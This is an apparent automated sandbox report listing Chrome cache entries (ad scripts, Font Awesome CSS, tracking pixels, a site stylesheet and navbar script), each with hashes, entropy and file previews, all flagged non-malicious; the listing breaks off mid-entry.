Preview:	.PNG........IHDR.......Z.............PLTE"..!.."..$.....A.0.........,..$..".....%........-..+../..!..-..#..2..)........(......../........&...........,.................3..5..S.D................0.........................&................[.L.................(........<.)......x.k.......................................>.,......7.#......$..5.!.............................9.&.........H.86.".......v.........?.,a.S..........{.....L.;...,.....).....h.[n._......L.;......C.2......A.2K.;....p._...g.X%..O.?...0....vl.[...rP.?t.f.....s-..C.2#..<.''.....E.3........y.h...G.9..z.j.....G.4.....q.^=.(...2..X.H...^.L..k.]A.......q..a.Pvvv...l.^n.`g.WR.=@.+9.&V.Ff.U\.IH.4Q.>...A.//.............yL.?...T.Ez.r..R.A3..e.OW.F...M.9t.d.....].Pt.iw.k...E.0............T.Ek.a~.p.....1.............zTXtRaw profile type APP1....m.A..0...~E......7u.HU[.....Rb+{..!X.\|...o...i......2.)hP....2....zl.U.......c.s.^.=..u7.Y%A8}d.ux.H{.......*^..7 ..v..g...S......o.].....p.Q..>n

Chrome Cache Entry: 348

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (27377)
Category:	dropped
Size (bytes):	27592
Entropy (8bit):	4.83669575258768
Encrypted:	false
SSDEEP:	384:Euwu4Eyfd7PNRzAmReUtPAM0NuzwpmnWt:ETuqdNReUtPAM0v4E
MD5:	5E5B0D8C7BE5919570A305B6BC229A36
SHA1:	E4AB3A85D3AB0A8654A278D954FB310906526DB3
SHA-256:	1AE3C19265723696F50E3226DCD43FBC7EA617697E0D7169A8E52C854AE3826C
SHA-512:	7FB88208B7D2E585F6C2B49BAF85AEF8D374A1C3F565596B50FFE49F2B5B6B5E1B39DADFCCC0E9971000346957551DA6316A911CDEED502B1983EB1598F37D62
Malicious:	false
Reputation:	unknown
Preview:	/!. Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa.fa-glass:before{content:"\f000"}.fa.fa-envelope-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-envelope-o:before{content:"\f0e0"}.fa.fa-star-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-home:before{content:"\f015"}.fa.fa-file-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-arrow-circle-o-dow

Chrome Cache Entry: 349

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2020)
Category:	dropped
Size (bytes):	9321
Entropy (8bit):	5.488083545900101
Encrypted:	false
SSDEEP:	192:hAdU2WTFZOKRme5HNf4E/Q3uuNQ8Qd3yuM9lFEjr5zG:hAd9WTvOYB5R4E/QeuNVK3yu6lF6r4
MD5:	35F2DD7CDD8EA7BEF7DD50FCA553A4A9
SHA1:	35FAD9B309BE65A4200B417E608DE9068649D701
SHA-256:	9F0E4A972197AF0DF6B45A3499BDA7BC8004A8D049673AF7076C867136C2A515
SHA-512:	335D139CF2C0A3BAE76B977129C66AA54AAF8BD87B8229CD465D0F2868430AE4572F1AC913539F65057E805B90BF172D6938F01DE7D974EF007DFC8955C37575
Malicious:	false
Reputation:	unknown
Preview:	(function(){'use strict';/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var h=this\|\|self;function k(a,b){a=a.split(".");var c=h;a[0]in c\|\|typeof c.execScript=="undefined"\|\|c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length\|\|b===void 0?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b};function aa(a){h.setTimeout(()=>{throw a;},0)};var l,p;a:{for(var q=["CLOSURE_FLAGS"],r=h,u=0;u<q.length;u++)if(r=r[q[u]],r==null){p=null;break a}p=r}var v=p&&p[610401301];l=v!=null?v:!1;var y;const z=h.navigator;y=z?z.userAgentData\|\|null:null;function A(a){return l?y?y.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function B(a){var b;a:{if(b=h.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function C(){return l?!!y&&y.brands.length>0:!1}function D(){return C()?A("Chromium"):(B("Chrome")\|\|B("CriOS"))&&!(C()?0:B("Edge"))\|\|B("Silk")};!B("Android")\|\|D();D();B("Safari")&&(D()\|\|(C()?0:B("Coast"))\|\|(C()?0:B("Opera"))\|\|(C()?0:

Chrome Cache Entry: 350

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2093)
Category:	dropped
Size (bytes):	445169
Entropy (8bit):	5.576759290731295
Encrypted:	false
SSDEEP:	12288:UrLbjvudFZTeHPGv7maR3WCdt4+/x3149jaxfR1tKaGcK0h3XJyx0sC1KP9IjYFy:UrLbjvudFZTeHPGv7maR3Wgt4+/x314S
MD5:	EDF0BD3351932D1136D53EE56770466C
SHA1:	4A45B85E71DB2E0B64C599A9DF52FB93B5C87933
SHA-256:	87575248B862E2DD9D62D9143007DB7A187D77144FD71A1027B4847AA20E53BB
SHA-512:	BA7A6FCEB65D95C5212CBBAB59130E41D31ED5D47397A39F38B3DDE6734E3DB0D50428FDB77FA9BE3A001B8EEF5C3A68552B8D367A680F9794E2E49C338807F7
Malicious:	false
Reputation:	unknown
Preview:	(function(sttc){'use strict';var q,aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ea={},fa={};function ia(a,b,c){if(!c\|\|a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ea?f=ea:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(ea,d,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[d]===void 0&&(a=Math.random()*1E9>>>0,fa[d]=da?ca.Symbol(d):"$jscp$"+a+"

Chrome Cache Entry: 351

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 125 x 36, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	7.7307811330275795
Encrypted:	false
SSDEEP:	24:ZKnbdfzwgJ+V3R1vSLy5D212jHe8zir90sNHrnC6JhGj+x79V0+LH7Uej9:ZuZbJ+VhAyB/j+9r90QLy+l0ybVh
MD5:	A41B8590BBDEDE59E04FAB9AD1934EB8
SHA1:	A688FE1849C6986344A52F1266244EE386CA009D
SHA-256:	4B74C8DE2F78D41DB98ADFD96A3EE0BCC4092018EB119952C341F820B38FB9D1
SHA-512:	92A67A772C56E3F0B838BC03B6C73C05C9E96C92E9BC64C4D1D011B2E37D961E483EAA0772CD885540C32A4A036D1AD62B30E63620A445472BD804CB8BD8B648
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...}...$........(....pHYs...........~.....PLTETL.]/.lC....i@.kB.lC.[,.d9.b6.^0.`3.QI.RJ.f;.TL.h=.SK.Y<....lC....qI..`...._W.......nE...........oh...........vO.......~x.XP....\|W.......{...........ZR..k..t.b5....UM.ib....lC.lC.lC.Y<.TL.GpLGpL.......CtRNS.............................................................4.....y.....1IDATX..kw.H......\X...........dv..................z.h..~..@.........?..u.:.......]A.$.a..._w..#..../cS......{..?Ho..k...l.-....+..w...v..b......g..s....k..h.](xw..R;.w....U....z.....&......T."......".....w..t.y..m...r1.M.5g.H.q..{..v..yp..L...=r.........g....UN..ty..S....'.0.C.;\|.c.R8N.#:....U50Y#..Uaq...oao...<.r?.(;.f<.K.mZv...)=..G......]:p..f;.:..V.D...&.gF..5.[....]..~.{...H.MW_...W..?.D...i.....qG.u4E..h*+J..^.C.<IXl..\|m.$.j^.xRd3.....P........(.yBR.X8.}..c.@..\!.3.S.... ..uI..<..2.Tj....E.F...W]..L...8...}..\|@'5...t..@."^3+T...q:4......P=7.N..@.(...>.^^C.3..n.G.rU..... Z.k.k.KL.....]....>hq.=..r...

Chrome Cache Entry: 352

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	C++ source, ASCII text, with very long lines (2015)
Category:	dropped
Size (bytes):	40512
Entropy (8bit):	5.518199113824284
Encrypted:	false
SSDEEP:	768:8xMuZ0jicWJj1GV2eYcZOYnHKoOFAVUagrLG9JQcgNYTrfgUYyzkoDBRW0sbh3fK:A+xbYcAYb2ZT3ZE3
MD5:	1614EFD8D8B318CA80C151AA5D983224
SHA1:	E27E5A72190F00DDABC4187084B8BD3850388D05
SHA-256:	B682B162DDD14D549C16FDCC70C01AAF1A7C1C5EE9D12F8A45081CAF38499FF4
SHA-512:	32E34011CAD366D6AC1BB0FD694829D233C66BB51813596A8EA6631E2E8516A25308768C988E9866C6B868174E993BCB62443D92AFEAFC9209B0A1C30CECECAB
Malicious:	false
Reputation:	unknown
Preview:	(function(){/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var m=this\|\|self;const aa=(new Date("2024-01-01T00:00:00Z")).getTime();.function ba(a){a=a.s;const b=encodeURIComponent;let c="";a.platform&&(c+="&uap="+b(a.platform));a.platformVersion&&(c+="&uapv="+b(a.platformVersion));a.uaFullVersion&&(c+="&uafv="+b(a.uaFullVersion));a.architecture&&(c+="&uaa="+b(a.architecture));a.model&&(c+="&uam="+b(a.model));a.bitness&&(c+="&uab="+b(a.bitness));a.fullVersionList&&(c+="&uafvl="+b(a.fullVersionList.map(d=>b(d.brand)+";"+b(d.version)).join("\|")));typeof a.wow64!=="undefined"&&(c+="&uaw="+Number(a.wow64));return c}.function ca(a,b){return a.g?a.m.slice(0,a.g.index)+b+a.m.slice(a.g.index):a.m+b}function da(a,b=0){let c="&act=1";b===0?c+="&ri=1":b===1?c+="&ri=24":b===2&&(c+="&ri=25");a.l&&a.s&&(c+=ba(a));a.h&&(c+="&suid="+a.o);return ca(a,c)}function ea(a,b){if(a.l&&a.i){if(b==1)return a.i\|\|""}else if(a.h){if(b==1)return ca(a,"&dct=1&suid="+a.o);if(b==3)re

Chrome Cache Entry: 353

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	175
Entropy (8bit):	4.619087129305596
Encrypted:	false
SSDEEP:	3:zIRBEBc2LGRNaPG1TsK/Aze1yXaPFeL6oQYEx/uc/pKK/oQ0CM33vov:0ULfG2K/Ke1D89uQc/pizCzv
MD5:	105FC75079DA05DFE0F9AB8E4CC1EDCE
SHA1:	345160078F8076B9D17E159FCBA711F724AF4099
SHA-256:	C240CA6597098155170D961700FB63A88DF5B6F335F484F37246A27D7CE3A497
SHA-512:	738C41F5C1EF9169415E2837517E08260DEBA971EB4F011147C8B63CFF4AF74E372F7A892C870B0F8B649F0004298041E7CA94462361C8A405E2DE36D253978D
Malicious:	false
Reputation:	unknown
URL:	https://trksyln.net/resources/js/navbar.js
Preview:	$(document).ready(function () {.. $('#nav-toggle').click(function () {.. $(this).toggleClass('is-active').. $('ul.nav').toggleClass('show');.. });..});....

Chrome Cache Entry: 354

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 355

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2775)
Category:	downloaded
Size (bytes):	93273
Entropy (8bit):	5.584589836285788
Encrypted:	false
SSDEEP:	1536:Xg80TNpmPCqiB3c+G5CSJ7FyCSzGWKZtO6Lz3FIk4K9SCeIzkDjtRbXQjzJIn+QN:XbqpmPCqU3cFTxyCSzGW7XFCeI4DjtNt
MD5:	8F69EB8CC76FB10B2AD5FDB55B62F12E
SHA1:	3104016FB431EC748E6D7D4828B7A9A41966752D
SHA-256:	E3849FBFBAF8AC5D5EBB07AEB38EC22BB6AEDA670195D7C36D40861E3BA77DFF
SHA-512:	049243109CF36EA35F712A67B49C97B460A12E91ECB930BF36D345136102529C7BE2A9B92D3B3C2D6AD5CD9D2972647686431C9D975A38E7D4C655BF3E6A75C0
Malicious:	false
Reputation:	unknown
URL:	https://pagead2.googlesyndication.com/pagead/managed/js/adsense/m202410240101/slotcar_library_fy2021.js
Preview:	(function(sttc){'use strict';var ca=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ea=da(this),fa=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ha={},ia={};function ja(a,b,c){if(!c\|\|a!=null){c=ia[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ka(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ha?f=ha:f=ea;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=fa&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ca(ha,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ia[d]===void 0&&(a=Math.random()*1E9>>>0,ia[d]=fa?ea.Symbol(d):"$jscp$"+a+"$"

Chrome Cache Entry: 356

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 357

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=adkernel&google_hm=QTE3NDY3NjA1ODAzNjEwMDM0ODY&google_push=AXcoOmSt1m7rF-4iFBqUxfNrh9kLkm2l2-27NM6ylpVM1BbGfx988rXg5S47kzFlUujGYJTCJlkITmT_GbciUFrM5Au3IbUbXt8y
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 358

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=linkedin&google_push=AXcoOmSQgPs7Xv78t6s6ncT7XrxnDPIcEW2AhdtYi5nilaIj7EKGuSot8TkF07yZfDqN2D_ygvnVHCTPP2fC72A7Z9HQINtP1gbPFg
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 359

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 360

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	11097
Entropy (8bit):	4.86821219419715
Encrypted:	false
SSDEEP:	192:3joyTTZVoZYamY4LwBbrcyXU1HRJIdJd/mqLt/8j/srhsVgNCSZRCZSQ/V9:30yT8CFLwBbRssV7G9
MD5:	ABCCC589AAFDC04112504C3881F17886
SHA1:	B697826106AF56992F531786164A577BBD2EFF8A
SHA-256:	57BB5E75D1B2A4AB12BA8466CA0AF97A67677089507C91333407B17E43D5A404
SHA-512:	B1901F286F599671A8616BA00F8C109F14187F9D57449E873B4E48F876C24419E6D1B3993CB59793CC230CC77C8B7E71B454565E9D1B2A1B6239FE52DB7B2394
Malicious:	false
Reputation:	unknown
URL:	https://trksyln.net/resources/css/site.css
Preview:	@charset "UTF-8";..@import url("https://fonts.googleapis.com/css?family=Baloo+Paaji\|Open+Sans:300,300i,400,400i,600,600i,700,700i");....:root {.. /* --blue: #1e549f;.. --indigo: #695aa6;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #ec185d;.. --orange: #ff6d02;.. --yellow: #ffc107;.. --green: #1bb74f;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #393e46;.. --primary: #695aa6;.. --secondary: #393e46;.. --success: #1bb74f;.. --info: #17a2b8;.. --warning: #ff6d02;.. --danger: #ec185d;.. --light: #f8f9fa;.. --dark: #212529;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-serif: "Open Sans", sans-serif;.. --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;/..}....,..::before,..::after {.. box-sizing: border-box;..}....html {.. font-family: sans-se

Chrome Cache Entry: 361

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	14484
Entropy (8bit):	7.80929669604045
Encrypted:	false
SSDEEP:	192:0OVJ+JAwfhiPlzKvEirnOn894MgMilxfsrbtf+kr8U+AXY1wVkjmdXJ2sas:0+J+W+XnLellUTr88YwVkyVJcs
MD5:	BA2206CF08E7192089AE34425DA3A22A
SHA1:	474847B1ACF9A360F8F85E8A837B4AB1339C3D87
SHA-256:	491E6A0581F6604237DEB317ADAFCD5923FDAFFFC2572CD8F3DF7079BD6DF490
SHA-512:	28BD9A4737A3EF8F1DDB9ED9533D5D3BEE901CC2EEF0231D46ACD61A5B56FD16FBE954250382860701A734543F1B37E8641B49F599EBD0AAA3B4A453E4815C35
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/simgad/10394649447504632882/14763004658117789537
Preview:	.PNG........IHDR.......t.....5Ve...]PLTE....r...................kkk...BBBXXX...&&&...K.......}}}.........3~..........q.._.......... .IDATx...i..:....Gk;.....#I.,o.....O...y.........................................................................................................................................................................a.%...e.<H1.X.-.w.f..$............<H.<H1..\..vk{......T...........$...s._....z.w......w....a....7. I. .......?..../.......a..{{.$x.bN`.3.3~.]QX......(....O.Y....R..........R.y.w..Eq`].~.&. I. ....o...<..........=o#..p3}...?.W.....R.q......n>~[...<..j.p3.....w<H.<H1.....\|..z].0.........X_.\|..e2....R.......>....}e..&+.fz..o.U.....R....w....w$..7..?.R...V...../?...$............Ay...*>...J........8(..$...s..../..X_...<\`}..^.{.....R.bw.H>\|`...;....-...z....$...s i.e...,.k=[^=^`=Qcy.$x.b....ny..z.j..'...x..<'.....R.a..?....z./..}..K..x..<G.....R.A.N....Y!_.K...........i..-..n....A..A.9Ht...e..........XW......\.

Chrome Cache Entry: 362

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 970 x 250, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	17192
Entropy (8bit):	7.482450703523413
Encrypted:	false
SSDEEP:	384:G8bygBLbqUgNX8BSHqwai/fffr2xq4pwpjjKidNi/:zBcqBSHfNjXVlRnI
MD5:	BF617F12941218EF6760C7095AE6C272
SHA1:	77475E56D2F3CD42FD9F4E301C19E76D956BC10C
SHA-256:	FBC53DC6D95EAA36041E47CE430910A98F5E393BD671436B7685C7CF361226AC
SHA-512:	F6C7FBCF07EEE8AB7ED9BC1FFA5460E9B9EEB2DB11591553CE1C754B8A1A96021D82FFAAA6BD658406D30DD2B4DE9FD305A8565970033C24B273B48192BB9AC4
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............N#N6....PLTEv.4.....L...TTT&&&.........'''SSS..RRR...w.5......u.3v.2v.5........x.4.....x......:::.........Q.....................nnn***...xxx...!!!..............................XXX............sss.....i..{...ccc...............4....8{{{..................q...............^^^HHHJJJ.....`.........```..................\|.?..Y..L..........x.9........kkk222PPP...........hhh..E......UUV......EEEMNN..............7.............5........AAA....A....A......v.4.......Y.+.......>.h.3....%.....===........=666...........V....:w.2......-....p...7.K......................_.k....g....).E.G......K......y.5.~..\[[.2..7.>........-........+..b...%SVP.`.......{.P...u....l....r......QTg.......M.......^UK........i..cA@?%......zTXtRaw profile type APP1....ePI..0....}..,}.iST.....8u..F.=...$.Z.u[..=..V.......1%0.,3.)8.E.D.....~..#.R../..1u.(G.....'U8A......`A.V.2q&`d6.9....\|....Q.....:....fGx...Hg4q.

Chrome Cache Entry: 363

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=beeswaxio&google_sc=&google_hm=QUFENkJVN09SNVFBQUJXb1Z0Yi1odw&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5&bee_sync_partners=&bee_sync_current_partner=adx&bee_sync_hop_count=1
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 364

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (53751)
Category:	downloaded
Size (bytes):	55046
Entropy (8bit):	5.749770380617164
Encrypted:	false
SSDEEP:	1536:jLCOJQlBSkHifn5zBc6q2JH0aFdST3BgKxbb1p:x8qzRqYsTp1p
MD5:	8AB9CF4FA237449BD1F1271F003392BF
SHA1:	EF424F4EE8416D18B985DA975E2F1E364639CD7A
SHA-256:	C8A165693096954C937CD385433D2F2D63D5F4CD7A1CD6F3BEB418B6350304EA
SHA-512:	D70BD3E068BA6CFEB2199B3B46C6EF75EA47D9D42AB14B1037A2AA492F1B493C720FB22B445703C119C0DC8DEDAF81B8AC20F4B3B62CCFE6F4081AC6201F83B5
Malicious:	false
Reputation:	unknown
URL:	https://pagead2.googlesyndication.com/bg/yKFlaTCWlUyTfNOFQz0vLWPV9M16HNbzvrQYtjUDBOo.js
Preview:	//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function b(u){return u}var d=function(u,R,Q,g,B,O,N,Z,m,C,w,S){for(C=(w=12,g);;)try{if(w==79)break;else if(w==71)w=y.console?41:27;else if(w==u)C=g,w=71;else if(w==41)y.console[O](S.message),w=27;else{if(w==76)return Z;if(w==Q)C=52,Z=m.createPolicy(N,{createHTML:T,createScript:T,createScriptURL:T}),w=27;else{if(w==27)return C=g,Z;w==R?w=m&&m.createPolicy?Q:76:w==12&&(m=y.trustedTypes,Z=B,w=R)}}}catch(J){if(C==g)throw J;C==52&&(S=J,w=u)}},T=function(u){return b.call(this,u)},y=this\|\|self;(0,eval)(function(u,R){return(R=d(92,19,40,87,null,"error","bg"))&&u.eval(R.createScript("1"))===1?function(Q){return R.createScript(Q)}:function(Q){return""+Q}}(y)(Array(Math.random()*7824\|0).join("\n")+['//# sourceMappingURL=data:application/json;ch

Chrome Cache Entry: 365

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	143
Entropy (8bit):	5.079318363208902
Encrypted:	false
SSDEEP:	3:PIy9JL/ZSGKHjJMzVJu+1vK3VYrSLIzECAXhxMAFjWAEtv0Gb:TJL/sGeMRJVSOGLIoDXhxVFjWAEd0Gb
MD5:	E4E31B474D3E0B577B3C8856E91F8659
